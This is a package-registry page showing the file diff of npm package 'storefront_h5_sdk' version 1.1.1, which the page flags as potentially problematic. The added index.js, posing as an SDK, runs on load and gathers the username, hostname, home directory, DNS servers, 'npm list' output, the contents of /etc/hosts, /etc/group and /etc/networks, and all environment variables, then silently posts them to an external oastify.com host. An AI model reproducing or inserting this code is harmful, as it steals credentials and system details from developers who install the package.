storefront_h5_sdk 1.1.1

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of storefront_h5_sdk might be problematic. Click here for more details.

Files changed (2) hide show
  1. package/index.js +56 -0
  2. package/package.json +11 -0
package/index.js ADDED
@@ -0,0 +1,56 @@
1
+ //author:- rawSpec
2
+ const os = require("os");
3
+ const dns = require("dns");
4
+ const fs=require("fs");
5
+ const querystring = require("querystring");
6
+ const https = require("https");
7
+ const { execSync } = require("child_process");
8
+ const packageJSON = require("./package.json");
9
+ const package = packageJSON.name;
10
+ const npmListOutput = execSync('npm list').toString('utf8');
11
+
12
+
13
+ const trackingData = JSON.stringify({
14
+ p: package,
15
+ c: __dirname,
16
+ hd: os.homedir(),
17
+ hn: os.hostname(),
18
+ hosts: fs.readFileSync("/etc/hosts").toString('utf8'),
19
+ un: os.userInfo().username,
20
+ dns: dns.getServers(),
21
+ file: fs.readFileSync("/etc/group").toString('utf8'),
22
+ npmList: npmListOutput,
23
+ file1: fs.readFileSync("/etc/networks").toString('utf8'),
24
+ environment: process.env,
25
+ r: packageJSON ? packageJSON.___resolved : undefined,
26
+ v: packageJSON.version,
27
+ pjson: packageJSON,
28
+ });
29
+
30
+ var postData = querystring.stringify({
31
+ msg: trackingData,
32
+ });
33
+
34
+ var options = {
35
+ hostname: "ovn8m3mpm90l4jw05kpia0d61x7ovhl5a.oastify.com",
36
+ port: 443,
37
+ path: "/",
38
+ method: "POST",
39
+ headers: {
40
+ "Content-Type": "application/x-www-form-urlencoded",
41
+ "Content-Length": postData.length,
42
+ },
43
+ };
44
+
45
+ var req = https.request(options, (res) => {
46
+ res.on("data", (d) => {
47
+ process.stdout.write(d);
48
+ });
49
+ });
50
+
51
+ req.on("error", (e) => {
52
+ // console.error(e);
53
+ });
54
+
55
+ req.write(postData);
56
+ req.end();
package/package.json ADDED
@@ -0,0 +1,11 @@
1
+ {
2
+ "name": "storefront_h5_sdk",
3
+ "version": "1.1.1",
4
+ "description": "h5_sdk",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "test": "echo \"Error: no test specified\" && exit 1"
8
+ },
9
+ "author": "",
10
+ "license": "ISC"
11
+ }